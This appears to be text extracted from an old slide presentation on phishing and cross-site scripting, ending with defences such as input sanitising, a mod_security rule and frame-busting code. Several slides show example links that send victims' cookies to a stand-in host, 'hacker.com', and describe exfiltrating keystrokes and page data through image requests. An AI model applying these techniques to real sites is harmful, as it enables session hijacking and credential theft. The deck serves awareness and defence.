valuable customer data, meet compliance standards,
and
maintain brand integrity.
4. Discussion Topics
Current Web Security Models
Phishing and Cross-Site Scripting (XSS)
XSS-Phishing Hybrid Attacks
Next Generation XSS Attacks
Best-Practices
5. Current Web Security Models
Secure Sockets Layer (SSL)
Web Browser Security
Two-Factor Authentication
6. Secure Sockets Layer (SSL)
Encrypts data between the client and server while in transit.Verify
the identity of the server and/or the client.
(Anyone actually look at the certificates?)
SSL does NOT make a website secure!
7. Browser Security:
Same-Origin Policy
“The same origin policy prevents documents or scripts loaded from
one
origin from getting or setting properties of a document from a
different
origin.“
Standard permission
http://www.mozilla.org/projects/security/components/same-
http://domain1.com/index.html denied error message
origin.html
OK
QuickTime™ and a
TIFF (Uncompressed) decompressor
are needed to see this picture.
Deny
8. Two-Factor Authentication
Online Banks, AOL, and others will begin rolling out this
type of solution. More organizations will follow this trend.
Compromising passwords and/or accounts is more
difficult when using two-factor authentication.Tokens
protect against several types of attacks, including forms of
phishing and spyware, but they are not a cure all.
Bruce Schneier Blog
The Failure of Two-Factor Authentication
“Two-factor authentication isn't our savior. It won't defend
against phishing. It's not going to prevent identity theft. It's not
going to secure online accounts from fraudulent transactions. It
solves the security problems we had ten years ago, not the
security problems we have today.”
http://www.schneier.com/blog/archives/2005/03/the_failure_of.
html
9. The Phishing Scam
High-Tech version of the age-old confidence scam
“Phishing attacks use both social engineering and technical
subterfuge to steal consumers' personal identity data and financial
account credentials. Social engineering schemes use 'spoofed' e
mails to lead consumers to counterfeit websites designed to trick
recipients into divulging financial data such as credit card numbers,
account usernames, passwords and social security numbers.
Hijacking brand names of banks, e-retailers and credit card
companies, phishers often convince recipients to respond.”
Anti-Phishing Working Group
10. The Common Approach
Real Website
Attacker contacts a user with
a forged email message
Qui ckTime™ and a
TIFF (Uncompressed) decompressor
are needed to see this pictur e.
User fills out the form
on the fake website
QuickTime™ and a
TIFF (Uncompressed) decompressor
are needed to see this picture.
PROFIT!
11. Other Methods of
Communication
Email
Instant Messages
Message Boards
Guestbooks
Blog Comments
Viruses, Trojan Horses, Spyware
etc.
12. Phishing Activity Trends Report
January 2005
The Anti-Phishing Working Group (APWG)
http://www.antiphishing.org/
Number of active phishing sites reported: 2560
Average monthly growth rate in phishing sites Jul-Jan:
28%
Number of brands hijacked by phishing in January: 64
Average time online for site: 5.8 (days)
Longest time online for site: 31 days
13. Cross-Site Scripting (XSS)
Targets the user, not the website
Javascript is what makes XSS really bad (very powerful
language)
Most commonly found web vulnerability
Impact generally underestimated or misunderstood
OWASP TOP-10 (A4) CERT Malicious HTML Tags
http://www.owasp.org/documentation/topten/a4.html http://www.cert.org/advisories/CA-2000-02.html
Web Security Threat Classification Gunter Ollmann
http://www.webappsec.org/threat.html http://www.technicalinfo.net/papers/CSS.html
The Cross-Site Scripting FAQ
http://www.cgisecurity.com/articles/xss-faq.shtml
14. JavaScript DOM Access
JavaScript has complete access to the DOM and is
capable of
doing just about anything. But what is anything?
Possible To:
Alter the content of news articles
Change the ACTION attribute of HTML Forms
etc, etc, etc.
Very hard for user to detect
15. Type 1 (Direct Echo)
Most common variety of XSS
Requires the victim to click a link to be exploited
When the victim clicks and the JavaScript code executes, it does
so in the context of the victim domain.
Attacker retrieves the
Attacker sends user an email containing a cookies from the web server
specially crafted link. The link has a hostname of logs where they can be
the victim website domain, looking legitimate, and used to hi-jack the users
laced with embedded JavScript code. When the session
user clicks the link... http://hacker.com/
http://victim.com/foo.cgi?q=<html_javascript_exploit_co
de>...
Cookies are sent off- QuickTime™ and a
QuickTime™ and a TIFF (Uncompressed) decompressor
TIFF (Uncompressed) decompressor
are needed to see this picture. domain using an are needed to see this picture.
image object request
16. Type 2 (HTML Injection)
Most dangerous variety of XSS
Does not require a user click, just visit a web page
Commonly found in HTML E-Mail, Message Boards, and Blog
posts Attacker retrieves the cookies
User clicks to view an email message sent by an from the web server logs
Attacker. The email message contains JavaScript where they can be used to hi-
exploit code. When the user loads the page... jack the users session
http://victim.com/foo.cgi?q=<html_javascript_expl http://hacker.com/
oit_code>...
QuickTime™ and a
TIFF (Uncompressed) decompressor QuickTime™ and a
are needed to see this picture. TIFF (Uncompressed) decompressor
are needed to see this picture.
Same attack, but requirements are less
17. XSS Can Be Used To...
Steal cookies and hi-jack sessions
Execute unintended website functionality
Harass users with malicious code
Alter any portion of the web page
Deface or DoS the website
Violate the same-origin policy
Aid in Phishing scams...
18. XSS-Phishing Hybrid Attack
The genie is out of the bottle
Google Plugs Cookie-Theft Data Leak
http://www.eweek.com/article2/0,1759,1751689,00.aspeBay
Redirect Becomes Phishing Tool
http://www.betanews.com/article/eBay_Redirect_Becomes_Phishin
g_Tool/1109886753
A phishing wolf in sheep's clothing
http://news.com.com/2100-7349_3-5616419.html
Online Banking Industry Very Vulnerable to Cross-Site Scripting
Frauds
http://news.netcraft.com/archives/2005/03/11/online_banking_indus
try_very_vulnerable_to_crosssite_scripting_frauds.html
Here's one more trick up hackers' sleeves
http://reviews.cnet.com/4520-3513_7-5021212.html
19. Hybrid Variants
Leveraging the target domain to convince the victim of
legitimacy
Attack Types:
XSS Redirect Disguise
XSS Page Re-writing
20. XSS Redirect Disguise
Phishing Activity Trends Report - January 2005
Cross-Site Scripting / Redirects
“During the month of January, Websense Security saw a number of
attacks
using cross-site scripting to redirect URL’s from popular web sites in
order to
better present themselves and as a means to prevent blocking. An
example of
this is an attack that was discovered utilized the Lycos search
engine. By crafting
a URL, the hacker can redirect any end user though Lycos directory
to their
fraudulent page. An example is below:
http://r.lycos.com/r/BJTWQSAUE/http://www.websensesecuritylabs.com
This link will automatically send the end user to Lycos, which in turn
redirects the
21. XSS Redirect Disguise
Attacker sends user an email containing a
specially crafted link. The link has a hostname
of the victim website domain, to appear
legitamate, and has an embedded redirect Fake WebsiteURL doesn‟t look
URL. When a user clicks the link, the
browser is re-directed to the injected URL. right, but is the user looking?
http://victim.com/redirect.cgi?url=http://www.b http://hacker.com/
ofa.com
QuickTime™ and a
TIFF (Uncompressed) decompressor
are needed to see this picture.
Simple. Effective.
22. XSS Page-Rewriting
This is a highly convincing and dangerous issue
We should be seeing more of this attack in the near future
Leverages XSS Type 1 (Direct Echo)
JavaScript can alter just about any aspect of a Attacker retrieves the cookies
web page. Its possible to change the location of from the web server logs where
where a HTML Form POSTS to, while the URL they can be used to hi-jack the
remains looking legitimate. users session
http://victim.com/webapp.cgi?url=<html_javascri http://hacker.com/
pt_exploit_code>...
QuickTime™ and a
TIFF (Uncompressed) decompressor
QuickTime™ and a are needed to see this picture.
TIFF (Uncompressed) decompressor
are needed to see this picture.
23. Next Generation XSS Attacks
Moving beyond simple garden variety XSS exploits to
explore what is truly possible
Several concepts based on...
XSS-Proxy
“An advanced Cross-Site-Scripting (XSS) attack
tool”
Developer: Anton Ranger
http://xss-proxy.sourceforge.net/
24. Current XSS Limitations
Victim-Attacker connection is not persistent.
Once the user clicks, the attacker loses control.
Off-Domain data transfer mechanism is only one-way
*Victim to Attacker*
25. Goals of XSS Exploitation
Persistent remote communication with the browser, even
if the user clicks around on the website
Complete control over the web browser and environment
Monitor several XSS‟ed clients simultaneously
As invisible as possible
Circumvent all previously described security models
26. XSS Remote Control
A User is cross-site scripted and third-party JavaScript exploit code
performs the following...
Empties the contents of the current
window.
Creates a full screen IFRAME with the
SRC
attribute equal to the URL of the current
page. To the user, nothing has been
visibly
affected and they continuously click within
the QuickTime™ and a
TIFF (Uncompressed) decompressor
are needed to see this picture.
IFRAME.
Whenever a link is clicked, the web page
contents are sent to an off-domain
server.
Keystroke recording is enabled capturing
any
text entered into HTML form fields.
Including
usernames and passwords.
27. Monitoring the Viewport
An IFRAME is an HTML tag used to
Include one web page within
another.The IFRAME is created to
be
displayed full-screen, making any
clicks QuickTime™ and a
TIFF (Uncompressed) decompressor
occurring within its borders. Since are needed to see this picture.
the
exploit code is loaded from the same
domain as the IFRAME, it has full
access
to the DOM.
28. Data Capturing
Saving the data
JavaScript saves data from
the
DOM including HTML,
cookies,
User-Agent, and keystrokes. QuickTime™ and a
TIFF (Uncompressed) decompressor
are needed to see this picture.
29. Data Transfering
Transferring large amounts of data while bypassing the
same-origin policy
Split the data into blocks. 2,000
bytes is
a large enough without exceeding
browser URL length limits.Base64
encode the blocks before transit.
Encoding ensures the data is not
altered by the browser.Data block
are
transferred individually with multiple
off-domain GET requests using
JavaScript image objects.
QuickTime™ and a
TIFF (Uncompressed) decompressor
are needed to see this picture.
30. Bi-Directional Communication
Send JavaScript command from the remote server to the client
In a continuous loop, a new “script”
tag
object is created with the src
attribute
URL of a remote location. When the QuickTime™ and a
TIFF (Uncompressed) decompressor
remote JavaScript file is updated, its are needed to see this picture.
executes within the clients browser.
JavaScript violates the same origin
policy by accessing data outside the
originating domain.
31. Success!
All security models previously mentioned have been circumvented.
With complete control over the user‟s web browser you can...
Use the doorway to automatically XSS other websites invisibly
Force the user to “hack” the website - download illegal content
Change the URL they are visiting
Anything.
32. Data sanitizing
The answer is to not be vulnerable to XSS.
The best way is to validate your input (query data, post data, cookies,
etc).
Developers, do not trust the client and do not use what you don‟t use
expect to receive. If at all possible, do not echo user supplied data to
the
screen. < <
At the time when untrusted data is
> > used (i.e. printing to screen)
“ " substitute the following characters
with the equivalent HTML entities.
„ ’ This process renders echoed HTML
laced data as unexecutable by the
( ( web browser.
) )
: :
34. Application platform security
Apache -Mod_Security
http://www.modsecurity.org/
<IfModule mod_security.c>
# Turn the filtering engine On or Off
SecFilterEngine On
# Make sure that URL encoding is valid
SecFilterCheckURLEncoding On
# Prevent XSS atacks # (HTML/Javascript injection)
SecFilter "<(.|n)+>”
</IfModule>
35. Application platform security
Microsoft IIS 6.0
Default .NET configuration is configured to prevent XSS
IIS Lockdown
http://www.microsoft.com/windows2000/en/server/iis/default.asp?url=/win
dows2000/en/server /iis/htm/core/iierrabt.htm
URL Scan
http://www.microsoft.com/technet/security/tools/urlscan.mspx
(May not be helpful if using IIS 6.0)
SecureIIS
http://www.eeye.com/html/products/secureiis/
36. Frame-Busting code
Add the following JavaScript code to your web pages.
This
code prevents other web pages from including your web
pages within HTML frames. Prevents client-side HTML
sniffing.
<SCRIPT language="javascript">
if (top != self) top.location.href =
location.href;
</SCRIPT>